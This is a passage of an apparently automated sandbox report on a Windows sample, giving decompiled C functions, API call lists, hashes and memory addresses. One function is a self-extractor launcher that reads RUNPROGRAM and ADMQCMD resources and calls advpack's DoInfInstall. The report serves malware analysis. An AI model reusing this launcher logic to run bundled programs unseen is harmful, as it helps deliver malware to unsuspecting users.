                                                                                                                                                                                                        • DispatchMessageA.USER32(?), ref: 001F36CB
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001F36DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2776232527-0
                                                                                                                                                                                                        • Opcode ID: b15fc7327ea4dee90b5718de476d270dc49bc29badbac6224795b15a94f61acd
                                                                                                                                                                                                        • Instruction ID: def8c81356b441649cedf8d673621705c15e141c8707c6c37d8d5924b3ffb63e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b15fc7327ea4dee90b5718de476d270dc49bc29badbac6224795b15a94f61acd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7701A77290421977DB304BA65C4CEFF767CEBC5B20F050119FA15E2180D664C780C670
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E001F65E8(char* __ecx) {
                                                                                                                                                                                                        				char _t3;
                                                                                                                                                                                                        				char _t10;
                                                                                                                                                                                                        				char* _t12;
                                                                                                                                                                                                        				char* _t14;
                                                                                                                                                                                                        				char* _t15;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t12 = __ecx;
                                                                                                                                                                                                        				_t15 = __ecx;
                                                                                                                                                                                                        				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                        				_t10 = 0;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t3 =  *_t12;
                                                                                                                                                                                                        					_t12 =  &(_t12[1]);
                                                                                                                                                                                                        				} while (_t3 != 0);
                                                                                                                                                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                        					if(_t16 <= _t15) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *_t16 == 0x5c) {
                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                        							_t16 = CharNextA(_t16);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t16 = _t10;
                                                                                                                                                                                                        						_t10 = 1;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(_t16);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return _t10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *_t16 == 0x5c) {
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}










                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,001F2B33), ref: 001F6602
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 001F6612
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 001F6629
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 001F6635
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Prev$Next
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3260447230-0
                                                                                                                                                                                                        • Opcode ID: c042b44964039f01b78b560b7a001154cea27068f8fb2996c090b4d39beca573
                                                                                                                                                                                                        • Instruction ID: e732773d7acc7c8ab3850865829141e98651cab58fc23ec596c46b755ebb4b4e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c042b44964039f01b78b560b7a001154cea27068f8fb2996c090b4d39beca573
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35F028720081556EE7321B288CC88BBBF9CCF8B374B2A01AFE69AD2501D7190D46C761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F69B0() {
                                                                                                                                                                                                        				intOrPtr* _t4;
                                                                                                                                                                                                        				intOrPtr* _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				 *0x1f81f8 = E001F6C70();
                                                                                                                                                                                                        				__set_app_type(E001F6FBE(2));
                                                                                                                                                                                                        				 *0x1f88a4 =  *0x1f88a4 | 0xffffffff;
                                                                                                                                                                                                        				 *0x1f88a8 =  *0x1f88a8 | 0xffffffff;
                                                                                                                                                                                                        				_t4 = __p__fmode();
                                                                                                                                                                                                        				_t11 =  *0x1f8528; // 0x0
                                                                                                                                                                                                        				 *_t4 = _t11;
                                                                                                                                                                                                        				_t5 = __p__commode();
                                                                                                                                                                                                        				_t12 =  *0x1f851c; // 0x0
                                                                                                                                                                                                        				 *_t5 = _t12;
                                                                                                                                                                                                        				_t6 = E001F7000();
                                                                                                                                                                                                        				if( *0x1f8000 == 0) {
                                                                                                                                                                                                        					__setusermatherr(E001F7000);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E001F71EF(_t6);
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 001F6FC5
                                                                                                                                                                                                        • __set_app_type.MSVCRT ref: 001F69C2
                                                                                                                                                                                                        • __p__fmode.MSVCRT ref: 001F69D8
                                                                                                                                                                                                        • __p__commode.MSVCRT ref: 001F69E6
                                                                                                                                                                                                        • __setusermatherr.MSVCRT ref: 001F6A07
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1632413811-0
                                                                                                                                                                                                        • Opcode ID: 228245aba37d0569d058935fad2d25c4528644f8726b96b0888b2dab1a0cd3a1
                                                                                                                                                                                                        • Instruction ID: c6614ec8c1bfe181a165569ebd4866cfebcaad1f7de76388d90514e57f635df4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 228245aba37d0569d058935fad2d25c4528644f8726b96b0888b2dab1a0cd3a1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4F015B02083099FC719AB30ED0A6383BA1FF15331B500609F5AA86AF1CF3E85C5CB15
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%


                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00DE3BA2() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				short _v300;
                                                                                                                                                                                                        				intOrPtr _v304;
                                                                                                                                                                                                        				void _v348;
                                                                                                                                                                                                        				char _v352;
                                                                                                                                                                                                        				intOrPtr _v356;
                                                                                                                                                                                                        				signed int _v360;
                                                                                                                                                                                                        				short _v364;
                                                                                                                                                                                                        				char* _v368;
                                                                                                                                                                                                        				intOrPtr _v372;
                                                                                                                                                                                                        				void* _v376;
                                                                                                                                                                                                        				intOrPtr _v380;
                                                                                                                                                                                                        				char _v384;
                                                                                                                                                                                                        				signed int _v388;
                                                                                                                                                                                                        				intOrPtr _v392;
                                                                                                                                                                                                        				signed int _v396;
                                                                                                                                                                                                        				signed int _v400;
                                                                                                                                                                                                        				signed int _v404;
                                                                                                                                                                                                        				void* _v408;
                                                                                                                                                                                                        				void* _v424;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                        				signed int _t79;
                                                                                                                                                                                                        				short _t96;
                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                        				intOrPtr _t98;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                                                        				signed int _t108;
                                                                                                                                                                                                        				int _t112;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				signed char _t118;
                                                                                                                                                                                                        				void* _t125;
                                                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                                                        				void* _t128;
                                                                                                                                                                                                        				struct HINSTANCE__* _t129;
                                                                                                                                                                                                        				void* _t130;
                                                                                                                                                                                                        				short _t137;
                                                                                                                                                                                                        				char* _t140;
                                                                                                                                                                                                        				signed char _t144;
                                                                                                                                                                                                        				signed char _t145;
                                                                                                                                                                                                        				signed int _t149;
                                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                        				signed int _t153;
                                                                                                                                                                                                        				void* _t155;
                                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                                        				signed int _t157;
                                                                                                                                                                                                        				signed int _t162;
                                                                                                                                                                                                        				signed int _t164;
                                                                                                                                                                                                        				void* _t165;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                        				_t69 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                        				_t153 = 0;
                                                                                                                                                                                                        				 *0xde9124 =  *0xde9124 & 0;
                                                                                                                                                                                                        				_t149 = 0;
                                                                                                                                                                                                        				_v388 = 0;
                                                                                                                                                                                                        				_v384 = 0;
                                                                                                                                                                                                        				_t165 =  *0xde8a28 - _t153; // 0x0
                                                                                                                                                                                                        				if(_t165 != 0) {
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t127 = 0;
                                                                                                                                                                                                        					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0xde8c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E00DE468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E00DE44B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0xde9124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00DE1AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00DE6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00DE3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0xde8580;
													if( *0xde8580 != 0) {
														E00DE2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0xde8180;
											if( *0xde8180 == 0) {
												_t146 = 0x4c7;
												E00DE44B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0xde9124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0xde9a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00DE6495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E00DE44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0xde9124 = E00DE6285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E00DE44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0xde8a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0xde9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0xde8a38 & 0x0000ffff;
											_v380 = 0xde9154;
											_v376 = _t151;
											_v372 = 0xde91e4;
											_v360 = _t97;
											if( *0xde8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0xde9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0xde8d48; // 0x0
                                                                                                                                                                                                        											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t145;
                                                                                                                                                                                                        											if(_t145 < 0) {
                                                                                                                                                                                                        												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                        												__eflags = _t104;
                                                                                                                                                                                                        												_v360 = _t104;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t98 =  *0xde9a38; // 0x0
                                                                                                                                                                                                        											_v356 = _t98;
                                                                                                                                                                                                        											_t130 = _t146;
                                                                                                                                                                                                        											 *0xdea288( &_v384);
                                                                                                                                                                                                        											_t101 = _v404();
                                                                                                                                                                                                        											__eflags = _t164 - _t164;
                                                                                                                                                                                                        											if(_t164 != _t164) {
                                                                                                                                                                                                        												_t130 = 4;
                                                                                                                                                                                                        												asm("int 0x29");
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											 *0xde9124 = _t101;
                                                                                                                                                                                                        											_push(_t129);
                                                                                                                                                                                                        											__eflags = _t101;
                                                                                                                                                                                                        											if(_t101 < 0) {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												goto L61;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												_t127 = _v400;
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0xde9a40 - 1; // 0x3
                                                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0xde8a20;
                                                                                                                                                                                                        										if( *0xde8a20 == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t157;
                                                                                                                                                                                                        										if(_t157 != 0) {
                                                                                                                                                                                                        											goto L38;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        										E00DE202A(_t146); // executed
                                                                                                                                                                                                        										goto L37;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v280;
                                                                                                                                                                                                        									_t108 = E00DE468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                        									__eflags = _t108;
                                                                                                                                                                                                        									if(_t108 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0xde8c42;
                                                                                                                                                                                                        									if( *0xde8c42 != 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                        									__eflags = _t112 == 0;
                                                                                                                                                                                                        									if(_t112 == 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L31;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t118 =  *0xde8a38; // 0x0
                                                                                                                                                                                                        								if(_t118 == 0) {
                                                                                                                                                                                                        									L23:
                                                                                                                                                                                                        									if(_t153 != 0) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E00DE468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                        										goto L27;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L25;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                        									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                        										goto L62;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "USRQCMD";
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E00DE468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                        										_t153 = 1;
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = "ADMQCMD";
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L26:
                                                                                                                                                                                                        						_push(_t130);
                                                                                                                                                                                                        						_t146 = 0x104;
                                                                                                                                                                                                        						E00DE1781( &_v276, 0x104, _t130, 0xde8c42);
                                                                                                                                                                                                        						goto L27;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t130 = "REBOOT";
                                                                                                                                                                                                        				_t125 = E00DE468F(_t130, 0xde9a2c, 4);
                                                                                                                                                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                        					goto L25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        0x00de3c4f
                                                                                                                                                                                                        0x00de3c56
                                                                                                                                                                                                        0x00de3c60
                                                                                                                                                                                                        0x00de3c65
                                                                                                                                                                                                        0x00de3c77
                                                                                                                                                                                                        0x00de3c78
                                                                                                                                                                                                        0x00de3c7c
                                                                                                                                                                                                        0x00de3c7e
                                                                                                                                                                                                        0x00de3c82
                                                                                                                                                                                                        0x00de3c82
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3c7c
                                                                                                                                                                                                        0x00de3c67
                                                                                                                                                                                                        0x00de3c69
                                                                                                                                                                                                        0x00de3c6d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3c58
                                                                                                                                                                                                        0x00de3c58
                                                                                                                                                                                                        0x00de3c6e
                                                                                                                                                                                                        0x00de3c6e
                                                                                                                                                                                                        0x00de3c87
                                                                                                                                                                                                        0x00de3c89
                                                                                                                                                                                                        0x00de3d4d
                                                                                                                                                                                                        0x00de3d4f
                                                                                                                                                                                                        0x00de3d50
                                                                                                                                                                                                        0x00de3d52
                                                                                                                                                                                                        0x00de3d9e
                                                                                                                                                                                                        0x00de3da8
                                                                                                                                                                                                        0x00de3daf
                                                                                                                                                                                                        0x00de3db4
                                                                                                                                                                                                        0x00de3db6
                                                                                                                                                                                                        0x00de3f4d
                                                                                                                                                                                                        0x00de3f4d
                                                                                                                                                                                                        0x00de3f4f
                                                                                                                                                                                                        0x00de3f56
                                                                                                                                                                                                        0x00de3f57
                                                                                                                                                                                                        0x00de3f58
                                                                                                                                                                                                        0x00de3f63
                                                                                                                                                                                                        0x00de3f63
                                                                                                                                                                                                        0x00de3dbc
                                                                                                                                                                                                        0x00de3dc0
                                                                                                                                                                                                        0x00de3dc2
                                                                                                                                                                                                        0x00de3de6
                                                                                                                                                                                                        0x00de3de6
                                                                                                                                                                                                        0x00de3de8
                                                                                                                                                                                                        0x00de3f0b
                                                                                                                                                                                                        0x00de3f0b
                                                                                                                                                                                                        0x00de3f0f
                                                                                                                                                                                                        0x00de3f13
                                                                                                                                                                                                        0x00de3f15
                                                                                                                                                                                                        0x00de3f1a
                                                                                                                                                                                                        0x00de3f1c
                                                                                                                                                                                                        0x00de3f46
                                                                                                                                                                                                        0x00de3f47
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3f47
                                                                                                                                                                                                        0x00de3f1e
                                                                                                                                                                                                        0x00de3f1f
                                                                                                                                                                                                        0x00de3f25
                                                                                                                                                                                                        0x00de3f26
                                                                                                                                                                                                        0x00de3f2a
                                                                                                                                                                                                        0x00de3f2d
                                                                                                                                                                                                        0x00de3fd9
                                                                                                                                                                                                        0x00de3fd9
                                                                                                                                                                                                        0x00de3fda
                                                                                                                                                                                                        0x00de3fda
                                                                                                                                                                                                        0x00de3fe1
                                                                                                                                                                                                        0x00de3fe3
                                                                                                                                                                                                        0x00de3fe3
                                                                                                                                                                                                        0x00de3fe8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3fe8
                                                                                                                                                                                                        0x00de3f33
                                                                                                                                                                                                        0x00de3f37
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3f37
                                                                                                                                                                                                        0x00de3dee
                                                                                                                                                                                                        0x00de3dee
                                                                                                                                                                                                        0x00de3df5
                                                                                                                                                                                                        0x00de3fad
                                                                                                                                                                                                        0x00de3fb9
                                                                                                                                                                                                        0x00de3fc2
                                                                                                                                                                                                        0x00de3fc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3fc8
                                                                                                                                                                                                        0x00de3dfb
                                                                                                                                                                                                        0x00de3dfd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3e03
                                                                                                                                                                                                        0x00de3e0a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3e15
                                                                                                                                                                                                        0x00de3e17
                                                                                                                                                                                                        0x00de3e19
                                                                                                                                                                                                        0x00de3f94
                                                                                                                                                                                                        0x00de3fa4
                                                                                                                                                                                                        0x00de3f7c
                                                                                                                                                                                                        0x00de3f80
                                                                                                                                                                                                        0x00de3f8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3f8b
                                                                                                                                                                                                        0x00de3e2c
                                                                                                                                                                                                        0x00de3e30
                                                                                                                                                                                                        0x00de3e34
                                                                                                                                                                                                        0x00de3e36
                                                                                                                                                                                                        0x00de3f69
                                                                                                                                                                                                        0x00de3f6e
                                                                                                                                                                                                        0x00de3f70
                                                                                                                                                                                                        0x00de3f76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3f76
                                                                                                                                                                                                        0x00de3e3c
                                                                                                                                                                                                        0x00de3e43
                                                                                                                                                                                                        0x00de3e47
                                                                                                                                                                                                        0x00de3e52
                                                                                                                                                                                                        0x00de3e56
                                                                                                                                                                                                        0x00de3e5c
                                                                                                                                                                                                        0x00de3e61
                                                                                                                                                                                                        0x00de3e68
                                                                                                                                                                                                        0x00de3e70
                                                                                                                                                                                                        0x00de3e74
                                                                                                                                                                                                        0x00de3e7c
                                                                                                                                                                                                        0x00de3e80
                                                                                                                                                                                                        0x00de3e82
                                                                                                                                                                                                        0x00de3e82
                                                                                                                                                                                                        0x00de3e87
                                                                                                                                                                                                        0x00de3e87
                                                                                                                                                                                                        0x00de3e8b
                                                                                                                                                                                                        0x00de3e91
                                                                                                                                                                                                        0x00de3e94

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE3C11
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00DE3CDC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                          • Part of subcall function 00DE468F: SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00DE8C42), ref: 00DE3D8F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00DE3E26
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00DE8C42), ref: 00DE3EFF
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00DE8C42), ref: 00DE3F1F
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00DE8C42), ref: 00DE3F40
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00DE8C42), ref: 00DE3F47
